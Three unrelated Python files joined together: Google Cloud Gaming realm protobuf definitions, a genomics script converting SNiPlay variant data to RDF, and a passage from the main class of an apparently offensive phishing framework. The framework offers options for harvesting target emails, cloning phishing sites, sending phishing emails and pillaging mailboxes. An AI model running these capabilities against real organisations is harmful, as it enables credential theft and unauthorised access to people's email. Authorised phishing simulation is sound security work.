Optional. The target timestamp to compute the
preview.
"""
realm = proto.Field(proto.MESSAGE, number=1, message="Realm",)
update_mask = proto.Field(
proto.MESSAGE, number=2, message=field_mask_pb2.FieldMask,
)
preview_time = proto.Field(
proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,
)
class PreviewRealmUpdateResponse(proto.Message):
r"""Response message for RealmsService.PreviewRealmUpdate.
Attributes:
etag (str):
ETag of the realm.
target_state (google.cloud.gaming_v1.types.TargetState):
The target state.
"""
etag = proto.Field(proto.STRING, number=2,)
target_state = proto.Field(proto.MESSAGE, number=3, message=common.TargetState,)
class Realm(proto.Message):
r"""A realm resource.
Attributes:
name (str):
The resource name of the realm, in the following form:
``projects/{project}/locations/{location}/realms/{realm}``.
For example,
``projects/my-project/locations/{location}/realms/my-realm``.
create_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. The creation time.
update_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. The last-modified time.
labels (Sequence[google.cloud.gaming_v1.types.Realm.LabelsEntry]):
The labels associated with this realm. Each
label is a key-value pair.
time_zone (str):
Required. Time zone where all policies
targeting this realm are evaluated. The value of
this field must be from the IANA time zone
database: https://www.iana.org/time-zones.
etag (str):
ETag of the resource.
description (str):
Human readable description of the realm.
"""
name = proto.Field(proto.STRING, number=1,)
create_time = proto.Field(proto.MESSAGE, number=2, message=timestamp_pb2.Timestamp,)
update_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
labels = proto.MapField(proto.STRING, proto.STRING, number=4,)
time_zone = proto.Field(proto.STRING, number=6,)
etag = proto.Field(proto.STRING, number=7,)
description = proto.Field(proto.STRING, number=8,)
__all__ = tuple(sorted(__protobuf__.manifest))
| |
from __future__ import with_statement
import pprint
from globalVars import *
import re
import os
import time
__author__ = 'elhassouni'
# Variable Globals ###################################################################################################
# Variable
path = '/media/elhassouni/donnees/Noeud-plante-projet/workspace/AgroLD/AgroLD_ETL/test_files/sniplay_db/sniplay_test.txt'
path_output = '/media/elhassouni/donnees/Noeud-plante-projet/workspace/AgroLD/AgroLD_ETL/rdf_ttl/sniplay_db_ttl/sniplay.ttl' # The output
output = open(path_output, "w")
pp = pprint.PrettyPrinter(indent=4)
# Definition des liste globals
alleles_liste_AA = list()
gene_list = list()
chromosome_list = list()
individu_list=list()
alleleliste = []
listeIndividu = list()
identifiantAlleliste = list ()
#identifiantAlleliste = list ()
# Definition de la liste des clefs
realine = open(path, 'r')
header = realine.readline()
header = re.sub('"', '', header)
header = re.sub(';;', ' ', header)
headerListe = header.split()
#print(headerListe)
dictionnaireAllele = {}
print(headerListe)
headerListe.remove("rs#")
headerListe.remove("alleles")
headerListe.remove("chrom")
headerListe.remove("pos")
headerListe.remove("gene")
print(headerListe)
for item in headerListe:
dictionnaireAllele[item] = []
# Variblae d'incrementation
number_allele = 1
count = 0
allele_incre = 0
# Variable Globals ###################################################################################################
# Fontion de recherche des items pour charque allele AA, CC, TT, GG pour les individus
cherchecle = lambda d, val: [c for c,v in d.items() if v==val]
def SaveHeader():
realine = open(path, 'r')
header = realine.readline()
header = re.sub('"', '', header)
header = re.sub(';;', ' ', header)
headerListe = header.split()
return headerListe
#Methode qui prend en parametre le fichier
#retourne la liste des donne
def ParseLine(file):
lineFile= list
lineFile = file.split('\t')
map_ds = list()
headers = list()
headers = SaveHeader()
map_ds.append(dict(zip(headers, lineFile)))
return map_ds
#Methode non necessaire
def buildeDicoVariant(listeIndividu):
AA = {'AA':[]}
for listeaa in listeIndividu:
AA['AA'].append(listeaa)
return AA
#Methode pour afficher l'ensemeble des donne d'un dictionnaire
#utiliser que si necessaire
def AfficheData(data):
for key,values in data.items():
for val in values:
print(val)
#Methode trouver les individu avec le variant AA avec en entre le fichier.
#appel de la methode ParseIndividu pour recuper a chaque ligne les donnees
def FoundVariantGG(file_in):
dataParsed = ParseLine(file_in)
for records in dataParsed:
listeGG = (cherchecle(records,'GG'))
#print(listeGG)
return listeGG
#Methode trouver les individu avec le variant AA avec en entre le fichier.
#appel de la methode ParseIndividu pour recuper a chaque ligne les donnees
def FoundVariantAA(file_in):
dataParsed = ParseLine(file_in)
for records in dataParsed:
listeGG = (cherchecle(records,'AA'))
#print(listeGG)
return listeGG
def FoundVariantTT(file_in):
dataParsed = ParseLine(file_in)
for records in dataParsed:
listeTT = (cherchecle(records,'TT'))
#print(listeGG)
return listeTT
def FoundVariantCC(file_in):
dataParsed = ParseLine(file_in)
for records in dataParsed:
listeCC = (cherchecle(records,'CC'))
#print(listeGG)
return listeCC
def increment():
global allele_incre
allele_incre = allele_incre+1
def ParseHapMap():
map_ds = list()
map_reader = open(path, "r")
for line in map_reader:
if line.startswith("rs#"): continue
parts = line.strip().split("\t")
normalizedInfo = {
"rs#": None if parts[0] == "." else parts[0],
"alleles": None if parts[1] == "." else parts[1],
"chrom": None if parts[2] == "." else parts[2],
"pos": None if parts[3] == "." else parts[3],
"gene": None if parts[4] == "." else parts[4],
"feature": None if parts[5] == "." else parts[5],
"effect": None if parts[6] == "." else parts[6],
"codon_change": None if parts[7] == "." else parts[7],
"amino_acid_change": None if parts[8] == "." else parts[8],
"MAF": None if parts[9] == "." else parts[9],
"missing_data": None if parts[10] == "." else parts[10],
"AA": FoundVariantAA(line),
"TT": FoundVariantTT(line),
"CC": FoundVariantCC(line),
"GG": FoundVariantGG(line)
}
sniplayModel(normalizedInfo)
def writeStudy():
sniplay_buffer = ''
sniplay_buffer += study_ns + "GBS_Courtois_et_al_2013" "\n"
for key, value in dictionnaireAllele.iteritems():
sniplay_buffer += "\t" + base_vocab_ns + "is_about" + "\t" + sniplay_individual_ns + key+ " ;\n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t\t" + obo_ns + "OBI_0000073" + " . \n"
output.write(sniplay_buffer)
print(sniplay_buffer)
# Write sniplay
def sniplayModel(sniplay_ds):
sniplay_buffer = ''
if not sniplay_ds['chrom'] in chromosome_list:
sniplay_buffer = ''
chromosome_list.append(sniplay_ds['chrom'])
chromosome = int(str(re.sub('Chr', '', sniplay_ds['chrom'])))
if chromosome < 10:
sniplay_buffer += chromosome_ns + "0" + str(chromosome) + "\n"
else:sniplay_buffer += chromosome_ns + str(chromosome) + "\n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t\t" + obo_ns + "SO_0000430" + " . \n"
print(sniplay_buffer)
output.write(sniplay_buffer)
if not sniplay_ds['gene'] in gene_list:
if sniplay_ds['gene'] == "intergenic:":
intergenic = sniplay_ds['chrom'] +"_" + sniplay_ds['pos'] + "_intergenic"
if not intergenic in gene_list:
gene_list.append(intergenic)
sniplay_buffer = ''
sniplay_buffer += sniplay_gene_integenic_ns + sniplay_ds['chrom'] +"_" + sniplay_ds['pos'] + "_intergenic" + " \n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t\t" + obo_ns + "SO_0000704" + " ;\n"
if sniplay_ds['feature'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_feature" + "\t" + sniplay_ds['feature'] + " ;\n"
sniplay_buffer += "\t" + base_vocab_ns + "has_start_position" + "\t" + " \"" + sniplay_ds['pos'] + "\" ;\n"
sniplay_buffer += "\t" + base_vocab_ns + "has_missing_data" + "\t" + " \"" + str(float(re.sub('%', '',sniplay_ds['missing_data']))/100) + "\"^^xsd:float ;\n"
if sniplay_ds['amino_acid_change'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_amino_acid_change" + "\t" + " \"" + sniplay_ds['amino_acid_change'] + "\" ;\n"
if sniplay_ds['effect'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_effect" + "\t" + " \"" + sniplay_ds['effect'] + "\" ;\n"
if sniplay_ds['codon_change'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_codon_change" + "\t" + " \"" + sniplay_ds['codon_change'] + "\";\n"
if sniplay_ds['AA']:
for indiv in sniplay_ds['AA']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['CC']:
for indiv in sniplay_ds['CC']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['TT']:
for indiv in sniplay_ds['TT']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['GG']:
for indiv in sniplay_ds['GG']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
else:
sniplay_buffer = ''
gene_list.append(sniplay_ds['gene'])
sniplay_buffer += sniplay_gene_ns + re.sub(':', '', sniplay_ds['gene']) + " \n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t\t" + obo_ns + "SO_0000704" + " ;\n"
if sniplay_ds['feature'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_feature" + "\t" + " \"" +sniplay_ds['feature'] + "\" ;\n"
sniplay_buffer += "\t" + base_vocab_ns + "has_start_position" + "\t" + " \"" + sniplay_ds['pos'] + "\" ;\n"
sniplay_buffer += "\t" + base_vocab_ns + "has_missing_data" + "\t" + " \"" + str(float(re.sub('%', '',sniplay_ds['missing_data']))/100) + "\"^^xsd:float ;\n"
if sniplay_ds['amino_acid_change'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_amino_acid_change" + "\t" + " \"" + sniplay_ds['amino_acid_change'] + "\";\n"
if sniplay_ds['effect'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_effect" + "\t" + " \"" + sniplay_ds['effect'] + "\" ;\n"
if sniplay_ds['codon_change'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_codon_change" + "\t" + " \"" + sniplay_ds['codon_change'] + "\" ;\n"
if sniplay_ds['AA']:
for indiv in sniplay_ds['AA']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
if sniplay_ds['CC']:
for indiv in sniplay_ds['CC']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['TT']:
for indiv in sniplay_ds['TT']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['GG']:
for indiv in sniplay_ds['GG']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
for indiv in sniplay_ds['AA']:
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + sniplay_ds['pos'] + "_" + indiv + "_AA_" + str(allele_incre) + " ;\n"
identifiant = sniplay_ds['pos'] + "_" + indiv + "_AA_" + str(allele_incre) + "_MAF_" + sniplay_ds['MAF']
dictionnaireAllele[indiv].append(str(identifiant))
for indiv in sniplay_ds['CC']:
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + sniplay_ds['pos'] + "_" + indiv + "_CC_" + str(allele_incre) + " ;\n"
identifiant = sniplay_ds['pos'] + "_" + indiv + "_CC_" + str(allele_incre) + "_MAF_" + sniplay_ds['MAF']
dictionnaireAllele[indiv].append(str(identifiant))
for indiv in sniplay_ds['TT']:
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + sniplay_ds['pos'] + "_" + indiv + "_TT_" + str(allele_incre) + " ;\n"
identifiant = sniplay_ds['pos'] + "_" + indiv + "_TT_" + str(allele_incre) + "_MAF_" + sniplay_ds['MAF']
dictionnaireAllele[indiv].append(str(identifiant))
for indiv in sniplay_ds['GG']:
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + sniplay_ds['pos'] + "_" + indiv + "_GG_" + str(allele_incre) + " ;\n"
identifiant = sniplay_ds['pos'] + "_" + indiv + "_GG_" + str(allele_incre) + "_MAF_" + sniplay_ds['MAF']
dictionnaireAllele[indiv].append(str(identifiant))
chrom = int(str(re.sub('Chr', '', sniplay_ds['chrom'])))
if chrom < 10:
sniplay_buffer += "\t" + base_vocab_ns + "is_located_on" + "\t" + chromosome_ns + "0" + str(chrom) + " .\n"
else:
sniplay_buffer += "\t" + base_vocab_ns + "is_located_on" + "\t" + chromosome_ns + str(chrom) + " .\n"
increment()
print(sniplay_buffer)
output.write(sniplay_buffer)
def writeIndividu():
sniplay_buffer = ''
for key, value in dictionnaireAllele.iteritems():
sniplay_buffer += sniplay_individual_ns + key + " \n"
for val in value:
valSplit = val.split('_MAF_')
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + valSplit[0] + " ;\n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t""\t" + co_ns + "CO_715:0000225" + " .\n"
print(sniplay_buffer)
output.write(sniplay_buffer)
def writeAllele():
sniplay_buffer = ''
for key, value in dictionnaireAllele.iteritems():
for val in value:
valSplit = val.split('_MAF_')
sniplay_buffer += sniplay_allele_ns + valSplit[0] + " \n"
sniplay_buffer += "\t" + base_vocab_ns + "has_maf" + "\t" + " \"" + str(float(re.sub('%', '',valSplit[1]))/100) + "\"^^xsd:float ;\n"
variant = valSplit[0].split('_')
if 'AA' in variant:
sniplay_buffer += "\t" + base_vocab_ns + "variant" + "\t" + "\"" + 'AA' + "\" ;\n"
if 'CC' in variant:
sniplay_buffer += "\t" + base_vocab_ns + "variant" + "\t" + "\"" + 'CC' + "\" ;\n"
if 'TT' in variant:
sniplay_buffer += "\t" + base_vocab_ns + "variant" + "\t" + "\"" + 'TT' + "\" ;\n"
if 'GG' in variant:
sniplay_buffer += "\t" + base_vocab_ns + "variant" + "\t" + "\"" + 'GG' + "\" ;\n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t" + obo_ns + "OBI_0001352" + " . \n"
print(sniplay_buffer)
output.write(sniplay_buffer)
# Sauvegarde dans un dictionnaire l'ensembe des donnee
def identifiantAllele():
map_reader = open(path, "r")
for line in map_reader:
if line.startswith("rs#"): continue
parts = line.strip().split("\t")
normalizedInfo = {
"rs#": None if parts[0] == "." else parts[0],
"alleles": None if parts[1] == "." else parts[1],
"chrom": None if parts[2] == "." else parts[2],
"pos": None if parts[3] == "." else parts[3],
"gene": None if parts[4] == "." else parts[4],
"MAF": None if parts[9] == "." else parts[9],
"AA": FoundVariantAA(line),
"TT": FoundVariantTT(line),
"CC": FoundVariantCC(line),
"GG": FoundVariantGG(line)
}
alleleliste.append(normalizedInfo)
def removeAlleleListe():
global alleleliste
alleleliste = ''
def writePrefix():
output.write(base + "\t" + "<" + base_uri + "> .\n")
output.write(pr + "\t" + rdf_ns + "<" + rdf + "> .\n")
output.write(pr + "\t" + rdfs_ns + "<" + rdfs + "> .\n")
output.write(pr + "\t" + xsd_ns + "<" + xsd + "> .\n")
output.write(pr + "\t" + owl_ns + "<" + owl_uri + "> .\n")
output.write(pr + "\t" + base_vocab_ns + "<" + base_vocab_uri + "> .\n")
output.write(pr + "\t" + obo_ns + "<" + obo_uri + "> .\n")
output.write(pr + "\t" + chromosome_ns + "<" + chromosome_uri + "> .\n")
output.write(pr + "\t" + sniplay_pos_ns + "<" + sniplay_pos_uri + "> .\n")
output.write(pr + "\t" + sniplay_consequence_ns + "<" + sniplay_consequence_uri + "> .\n")
output.write(pr + "\t" + study_ns + "<" + study_uri + "> .\n")
output.write(pr + "\t" + sniplay_gene_ns + "<" + sniplay_gene_uri + "> .\n")
output.write(pr + "\t" + sniplay_gene_integenic_ns + "<" + sniplay_gene_integenic_uri + "> .\n")
output.write(pr + "\t" + sniplay_individual_ns + "<" + sniplay_individual_uri + "> .\n")
output.write(pr + "\t" + sniplay_allele_ns + "<" + sniplay_allele_uri + "> .\n")
output.write(pr + "\t" + co_ns + "<" + co_uri + "> .\n")
# MAIN #################################################################################################################
def sniplayPaserModel():
avant = time.clock()
identifiantAllele()
#print(alleleliste)
writePrefix()
# La Fonction ParserHapMap ecrit les chromosome et les genes
ParseHapMap()
writeIndividu()
writeAllele()
writeStudy()
print 'Time execution : ',time.clock() - avant
| |
#!/usr/bin/env python3
#import getopt
import argparse
from . import emails
import sys
import re
import os
import subprocess
import time
import signal
from collections import defaultdict
#import our libs
from .emails import EmailTemplate
from .utils import Utils
from .display import Display
from .gather import Gather
from .mydns import Dns
from .webprofiler import profiler
from .mydb import MyDB
from .sitecloner import SiteCloner
from .mailpillager import MailPillager
from . import portscan
#import our modules
from modules.theharvester import theHarvester
#=================================================
# Primary CLASS
#=================================================
class Framework(object):
def __init__(self):
self.config = {} # dict to contain combined list of config file options and commandline parameters
self.email_list = [] # list of email targets
self.hostname_list = [] # list of dns hosts
self.server_list = {}
self.profile_valid_web_templates = []
self.profile_dynamic_web_templates = []
self.pillaged_users = []
self.bestMailServerPort = None
self.bestMailServer = None
self.webserver = None # web server process
self.webserverpid = None
self.smbserver = None # smb server process
self.smbserverpid = None
self.gather = None
self.mp = None # mail pillager
# initialize some config options
self.config["domain_name"] = ""
self.config["phishing_domain"] = ""
self.config["company_name"] = ""
self.config["config_filename"] = ""
self.config["email_list_filename"] = ""
# default all bool values to False
self.config["verbose"] = False
self.config["gather_emails"] = False
self.config["gather_dns"] = False
self.config["enable_externals"] = False
self.config["enable_web"] = False
self.config["enable_email"] = False
self.config["enable_email_sending"] = False
self.config["simulate_email_sending"] = False
self.config["daemon_web"] = False
self.config["always_yes"] = False
self.config["enable_advanced"] = False
self.config["profile_domain"] = False
self.config["pillage_email"] = False
#self.config["attachment_filename"] = None
#self.config["attachment_fullpath"] = None
# get current IP
#self.config['ip'] = None
# set a few misc values
self.pid_path = os.path.dirname(os.path.realpath(__file__)) + "/../"
self.display = Display()
self.email_templates = defaultdict(list)
#==================================================
# SUPPORT METHODS
#==================================================
#----------------------------
# CTRL-C display and exit
#----------------------------
def ctrlc(self):
print()
self.display.alert("Ctrl-C caught!!!")
self.cleanup()
#----------------------------
# Close everything down nicely
#----------------------------
def cleanup(self):
print()
if (self.smbserver is not None):
# send SIGTERM to the smb process
self.display.output("Stopping the SMB server")
#self.display.output("stopping the smbserver")
#self.smbserver.send_signal(signal.SIGINT)
# as a double check, manually kill the process
self.killProcess(self.smbserverpid, "spfsmbsrv.pid")
if (self.webserver is not None):
if (self.config["daemon_web"]):
self.display.alert("Webserver is still running as requested.")
else:
# send SIGTERM to the web process
self.display.output("Stopping the web server")
self.webserver.send_signal(signal.SIGINT)
# as a double check, manually kill the process
self.killProcess(self.webserverpid, "spfwebsrv.pid")
# call report generation
self.generateReport()
# exit
sys.exit(0)
#----------------------------
# Kill specified process
#----------------------------
def killProcess(self, pid, filename):
if (os.path.exists("/proc/" + str(pid))):
self.display.alert("Killing process [%s]" % (pid))
os.kill(pid, signal.SIGKILL)
if (os.path.isfile(self.pid_path + filename)):
os.remove(self.pid_path + filename)
#----------------------------
# Generate The simple report
#----------------------------
def generateReport(self):
print()
self.display.output("Generating phishing report")
self.display.log("ENDTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
# Start process
cmd = [os.getcwd() + "/report.py", self.outdir]
try:
output = subprocess.check_output(cmd).splitlines()[-1].decode()
#dd, stderr=subprocess.STDOUT, shell=True)
self.display.output("Report file located at %s%s" % (self.outdir + "reports/", str(output)))
except subprocess.CalledProcessError as e:
raise RuntimeError("command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
#----------------------------
# Parse CommandLine Parms
#----------------------------
def parse_parameters(self, argv):
parser = argparse.ArgumentParser()
#==================================================
# Input Files
#==================================================
filesgroup = parser.add_argument_group('input files')
filesgroup.add_argument("-f",
metavar="<list.txt>",
dest="email_list_file",
action='store',
help="file containing list of email addresses")
filesgroup.add_argument("-C",
metavar="<config.txt>",
dest="config_file",
action='store',
help="config file")
#==================================================
# Enable Flags
#==================================================
enablegroup = parser.add_argument_group('enable flags')
enablegroup.add_argument("--all",
dest="enable_all",
action='store_true',
help="enable ALL flags... same as (-g --external -s -w -v -v -y)")
enablegroup.add_argument("--test",
dest="enable_test",
action='store_true',
help="enable all flags EXCEPT sending of emails... same as (-g --external --simulate -w -y -v -v)")
enablegroup.add_argument("--recon",
dest="enable_recon",
action='store_true',
help="gather info (i.e. email addresses, dns hosts, websites, etc...) same as (-e --dns)")
enablegroup.add_argument("--external",
dest="enable_external",
action='store_true',
help="enable external tool utilization")
enablegroup.add_argument("--dns",
dest="enable_gather_dns",
action='store_true',
help="enable automated gathering of dns hosts")
enablegroup.add_argument("-g",
dest="enable_gather_email",
action='store_true',
help="enable automated gathering of email targets")
enablegroup.add_argument("-s",
dest="enable_send_email",
action='store_true',
help="enable automated sending of phishing emails to targets")
enablegroup.add_argument("--simulate",
dest="simulate_send_email",
action='store_true',
help="simulate the sending of phishing emails to targets")
enablegroup.add_argument("-w",
dest="enable_web",
action='store_true',
help="enable generation of phishing web sites")
enablegroup.add_argument("-W",
dest="daemon_web",
action='store_true',
help="leave web server running after termination of spf.py")
#==================================================
# Advanced Flags
#==================================================
advgroup = parser.add_argument_group('ADVANCED')
advgroup.add_argument("--adv",
dest="enable_advanced",
action='store_true',
help="perform all ADVANCED features same as (--dns --profile --pillage)")
advgroup.add_argument("--profile",
dest="profile_domain",
action='store_true',
help="profile the target domain (requires the --dns flag)")
advgroup.add_argument("--pillage",
dest="pillage_email",
action='store_true',
help="auto pillage email accounts (requires the --dns flag)")
#==================================================
# Optional Args
#==================================================
parser.add_argument("-d",
metavar="<domain>",
dest="domain",
action='store',
help="domain name to phish")
parser.add_argument("-p",
metavar="<domain>",
dest="phishdomain",
default="example.com",
action='store',
help="newly registered 'phish' domain name")
parser.add_argument("-c",
metavar="<company's name>",
dest="company",
action='store',
help="name of company to phish")
parser.add_argument("--ip",
metavar="<IP address>",
dest="ip",
#default=Utils.getIP(),
action='store',
help="IP of webserver defaults to [%s]" % (Utils.getIP()))
parser.add_argument("-v", "--verbosity",
dest="verbose",
action='count',
help="increase output verbosity")
#==================================================
# Misc Flags
#==================================================
miscgroup = parser.add_argument_group('misc')
miscgroup.add_argument("-y",
dest="always_yes",
action='store_true',
help="automatically answer yes to all questions")
# parse args
args = parser.parse_args()
# convert parameters to values in the config dict
self.config["domain_name"] = args.domain
if (self.config["domain_name"] is None):
self.config["domain_name"] = ""
self.config["phishing_domain"] = args.phishdomain
if (self.config["phishing_domain"] is None):
self.config["phishing_domain"] = "example.com"
self.config["company_name"] = args.company
if (args.ip):
self.config["ip"] = args.ip
self.config["config_filename"] = args.config_file
self.config["email_list_filename"] = args.email_list_file
self.config["verbose"] = args.verbose
self.config["gather_emails"] = args.enable_gather_email
self.config["gather_dns"] = args.enable_gather_dns
self.config["profile_domain"] = args.profile_domain
self.config["pillage_email"] = args.pillage_email
self.config["enable_externals"] = args.enable_external
self.config["enable_web"] = args.enable_web
self.config["enable_email_sending"] = args.enable_send_email
self.config["simulate_email_sending"] = args.simulate_send_email
self.config["daemon_web"] = args.daemon_web
self.config["always_yes"] = args.always_yes
# process meta flags
# recon = gather emails and gather dns
if (args.enable_recon == True):
self.config["gather_emails"] = True
self.config["gather_dns"] = True
# all = gather emails, enable externals, etc...
if (args.enable_all == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["enable_web"] = True
self.config["enable_email_sending"] = True
self.config["verbose"] = 2
self.config["always_yes"] = True
# test = gather emails, enable externals, etc...
if (args.enable_test == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["simulate_email_sending"] = True
self.config["enable_web"] = True
self.config["always_yes"] = True
self.config["verbose"] = 2
# advanced = dns, profile, and pillage
if (args.enable_advanced == True):
self.config["gather_dns"] = True
self.config["profile_domain"] = True
self.config["pillage_email"] = True
# profile requires dns
if (self.config["profile_domain"] and not self.config["gather_dns"]):
self.config["profile_domain"] = False
self.display.error("--profile requires the --dns option to be enabled as well.")
# pillage requires dns
if (self.config["pillage_email"] and not self.config["gather_dns"]):
self.config["pillage_email"] = False
self.display.error("--pillage requires the --dns option to be enabled as well.")
# see if we are good to go
good = False
if (self.config["email_list_filename"]
or self.config["gather_emails"]
or self.config["enable_externals"]
or self.config["enable_web"]
or self.config["enable_email_sending"]
or self.config["simulate_email_sending"]
or self.config["gather_dns"]
or self.config["profile_domain"]
or self.config["pillage_email"]):
good = True
if (not good):
self.display.error("Please enable at least one of the following parameters: -g --external --dns -s --simulate -w ( --all --test --recon --adv )")
print()
parser.print_help()
sys.exit(1)
#----------------------------
# Process/Load config file
#----------------------------
def load_config(self):
# does config file exist?
if (self.config["config_filename"] is not None):
temp1 = self.config
temp2 = Utils.load_config(self.config["config_filename"])
self.config = dict(list(temp2.items()) + list(temp1.items()))
else:
# guess not.. so try to load the default one
if Utils.is_readable("misc/default.cfg"):
self.display.error("a CONFIG FILE was not specified... defaulting to [misc/default.cfg]")
print()
temp1 = self.config
temp2 = Utils.load_config("misc/default.cfg")
self.config = dict(list(temp2.items()) + list(temp1.items()))
else:
# someone must have removed it!
self.display.error("a CONFIG FILE was not specified...")
print()
sys.exit(1)
# set verbosity/debug level
if (self.config.get("verbose")):
if (self.config['verbose'] >= 1):
self.display.enableVerbose()
if (self.config.get("verbose")):
if (self.config['verbose'] > 1):
self.display.enableDebug()
if (self.config["ip"] == "0.0.0.0") or (self.config["ip"] is None):
self.config["ip"]=Utils.getIP()
# set logging path
self.outdir = os.getcwd() + "/" + self.config["domain_name"] + "_" + self.config["phishing_domain"] + "/"
if not os.path.exists(os.path.dirname(self.outdir)):
os.makedirs(os.path.dirname(self.outdir))
self.display.setLogPath(self.outdir + "logs/")
# create sqllite db
self.db = MyDB(sqlite_file=self.outdir)
# log it
self.display.log("STARTTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
self.display.log("TARGETDOMAIN=%s\n" % (self.config["domain_name"]), filename="INFO.txt")
self.display.log("PHISHINGDOMAIN=%s\n" % (self.config["phishing_domain"]), filename="INFO.txt")
#----------------------------
# Load/Gather target email addresses
#----------------------------
def prep_email(self):
# are required flags set?
if ((self.config["email_list_filename"] is not None) or (self.config["gather_emails"] == True)):
print()
self.display.output("Obtaining list of email targets")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# if an external email list file was specified, read it in
if self.config["email_list_filename"] is not None:
file = open(self.config["email_list_filename"], 'r')
temp_list = file.read().splitlines()
self.display.verbose("Loaded [%s] email addresses from [%s]" % (len(temp_list), self.config["email_list_filename"]))
self.email_list += temp_list
# gather email addresses
if self.config["gather_emails"] == True:
if (self.config["domain_name"] == ""):
self.display.error("No target domain specified. Can not gather email addresses.")
else:
self.display.verbose("Gathering emails via built-in methods")
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.emails()
self.display.verbose("Gathered [%s] email addresses from the Internet" % (len(temp_list)))
self.email_list += temp_list
print()
# gather email addresses from external sources
if (self.config["gather_emails"] == True) and (self.config["enable_externals"] == True):
# theHarvester
self.display.verbose("Gathering emails via theHarvester")
thr = theHarvester(self.config["domain_name"], self.config["theharvester_path"], display=self.display)
out = thr.run()
if (not out):
temp_list = thr.emails()
self.display.verbose("Gathered [%s] email addresses from theHarvester" % (len(temp_list)))
self.email_list += temp_list
else:
self.display.error(out)
print()
# # Recon-NG
# self.display.verbose("Gathering emails via Recon-NG")
# temp_list = reconng(self.config["domain_name"], self.config["reconng_path"]).gather()
# self.display.verbose("Gathered [%s] email addresses from Recon-NG" % (len(temp_list)))
# self.email_list += temp_list
# sort/unique email list
self.email_list = Utils.unique_list(self.email_list)
self.email_list.sort()
# add each user to the sqllite db
self.db.addUsers(self.email_list)
# print list of email addresses
self.display.verbose("Collected [%s] unique email addresses" % (len(self.email_list)))
self.display.print_list("EMAIL LIST",self.email_list)
for email in self.email_list:
self.display.log(email + "\n", filename="email_targets.txt")
#----------------------------
# Gather dns hosts
#----------------------------
def gather_dns(self):
# are required flags set?
if (self.config["gather_dns"] == True):
print()
self.display.output("Obtaining list of host on the %s domain" % (self.config["domain_name"]))
self.display.verbose("Gathering hosts via built-in methods")
# Gather hosts from internet search
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.hosts()
self.display.verbose("Gathered [%s] hosts from the Internet Search" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from DNS lookups
temp_list = Dns.xfr(self.config["domain_name"])
